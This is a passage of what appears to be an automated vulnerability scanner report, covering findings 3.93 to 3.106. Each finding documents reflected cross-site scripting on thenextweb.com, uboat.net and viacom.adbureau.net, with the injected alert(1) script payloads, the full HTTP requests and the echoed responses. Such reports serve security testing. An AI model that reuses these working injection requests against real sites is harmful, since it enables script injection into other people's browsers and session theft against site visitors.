Set-Cookie: PHPSESSID=ej3jtbaapag6sv6oln1b9fcd96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:48:16 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:48:16 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:48:16 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82030
Date: Tue, 19 Apr 2011 19:51:38 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
stry',
'theme_url': 'http://thenextweb.com/industry/wp-content/themes/tnw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?5d8bd</script><script>alert(1)</script>73986555b6d=1'
};
</script>
...[SNIP]...

3.93. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the utm_content request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9bcc</script><script>alert(1)</script>f5ad851bd4d was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-maine9bcc</script><script>alert(1)</script>f5ad851bd4d&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=2shuvoef74afqc8k3ecf4kfq14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:48:48 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:48:48 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:48:48 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82211
Date: Tue, 19 Apr 2011 19:52:11 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
dustry/wp-content/themes/tnw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-maine9bcc</script><script>alert(1)</script>f5ad851bd4d&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to'
};
</script>
...[SNIP]...

3.94. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the utm_medium request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d1ad</script><script>alert(1)</script>24749fe4f25 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter8d1ad</script><script>alert(1)</script>24749fe4f25&utm_source=direct-tnw.to HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=3voqo3o46tv6l2mb54bvds3cu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:49:05 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:49:05 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:49:05 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82211
Date: Tue, 19 Apr 2011 19:52:28 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
nw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter8d1ad</script><script>alert(1)</script>24749fe4f25&utm_source=direct-tnw.to'
};
</script>
...[SNIP]...

3.95. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the utm_source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a19e</script><script>alert(1)</script>fa26e178082 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to5a19e</script><script>alert(1)</script>fa26e178082 HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=iovjlagptga9dlhualmg2cjsa6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:49:16 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:49:16 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:49:16 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82211
Date: Tue, 19 Apr 2011 19:52:38 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
rl': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to5a19e</script><script>alert(1)</script>fa26e178082'
};
</script>
...[SNIP]...

3.96. http://uboat.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2a26<script>alert(1)</script>f4d51860e62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof2a26<script>alert(1)</script>f4d51860e62 HTTP/1.1
Host: uboat.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=197206507.357766803.1303244360.1303244360.1303244360.1; __utmb=197206507; __utmc=197206507; __utmz=197206507.1303244360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 20:19:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 9021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong>http://uboat.net/favicon.icof2a26<script>alert(1)</script>f4d51860e62</strong>
...[SNIP]...

3.97. http://uboat.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload eeee5--><script>alert(1)</script>d24a13b2fbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoeeee5--><script>alert(1)</script>d24a13b2fbf HTTP/1.1
Host: uboat.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=197206507.357766803.1303244360.1303244360.1303244360.1; __utmb=197206507; __utmc=197206507; __utmz=197206507.1303244360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 20:19:03 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 8937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<!--404, /favicon.icoeeee5--><script>alert(1)</script>d24a13b2fbf, Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16, /favicon.icoeeee5-->
...[SNIP]...

3.98. http://uboat.net/history/wwi/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /history/wwi/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8e308--><script>alert(1)</script>08f8526848f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /history8e308--><script>alert(1)</script>08f8526848f/wwi/ HTTP/1.1
Host: uboat.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 19:48:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 9023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<!--404, /history8e308--><script>alert(1)</script>08f8526848f/wwi/, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0), /history8e308-->
...[SNIP]...

3.99. http://uboat.net/history/wwi/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /history/wwi/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba0c5<script>alert(1)</script>d32186e7767 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /historyba0c5<script>alert(1)</script>d32186e7767/wwi/ HTTP/1.1
Host: uboat.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 19:48:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 8906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong>http://uboat.net/historyba0c5<script>alert(1)</script>d32186e7767/wwi/</strong>
...[SNIP]...

3.100. http://uboat.net/history/wwi/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /history/wwi/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dfcc<script>alert(1)</script>3770393b851 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /history/wwi1dfcc<script>alert(1)</script>3770393b851/ HTTP/1.1
Host: uboat.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 19:48:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 9014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong>http://uboat.net/history/wwi1dfcc<script>alert(1)</script>3770393b851/</strong>
...[SNIP]...

3.101. http://uboat.net/history/wwi/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /history/wwi/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 3a303--><script>alert(1)</script>de1b2bc497a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /history/wwi3a303--><script>alert(1)</script>de1b2bc497a/ HTTP/1.1
Host: uboat.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 19:48:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 8922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<!--404, /history/wwi3a303--><script>alert(1)</script>de1b2bc497a/, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0), /history/wwi3a303-->
...[SNIP]...

3.102. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1407'%3balert(1)//6b06bfedd3b was submitted in the REST URL parameter 2. This input was echoed as d1407';alert(1)//6b06bfedd3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AFTRSERVER/hserverd1407'%3balert(1)//6b06bfedd3b//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:17 GMT
X-DirectServer: viacom_DS21
Content-Type: text/html
Content-Length: 2332
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000d1407';alert(1)//6b06bfedd3b//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent
...[SNIP]...

3.103. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52531'%3balert(1)//e133daf0ee1 was submitted in the REST URL parameter 3. This input was echoed as 52531';alert(1)//e133daf0ee1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AFTRSERVER/hserver//height52531'%3balert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:17 GMT
X-DirectServer: viacom_DS25
Content-Type: text/html
Content-Length: 2332
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000//height52531';alert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload
...[SNIP]...

3.104. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f655b'%3balert(1)//9025d8e1577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f655b';alert(1)//9025d8e1577 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543?f655b'%3balert(1)//9025d8e1577=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:17 GMT
X-DirectServer: viacom_DS17
Content-Type: text/html
Content-Length: 2335
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1303072666-9018543?f655b'%3balert(1); expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543?f655b';alert(1)//9025d8e1577=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';


/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

3.105. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b4dd'%3balert(1)//9cd18a86ff4 was submitted in the REST URL parameter 1. This input was echoed as 8b4dd';alert(1)//9cd18a86ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver8b4dd'%3balert(1)//9cd18a86ff4/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:06:02 GMT
X-DirectServer: viacom_DS22
Content-Type: text/html
Content-Length: 2310
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5235,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=0000147300000000000000008b4dd';alert(1)//9cd18a86ff4/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5235';



...[SNIP]...

3.106. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6779'%3balert(1)//985a6732d77 was submitted in the REST URL parameter 2. This input was echoed as e6779';alert(1)//985a6732d77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/heighte6779'%3balert(1)//985a6732d77=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
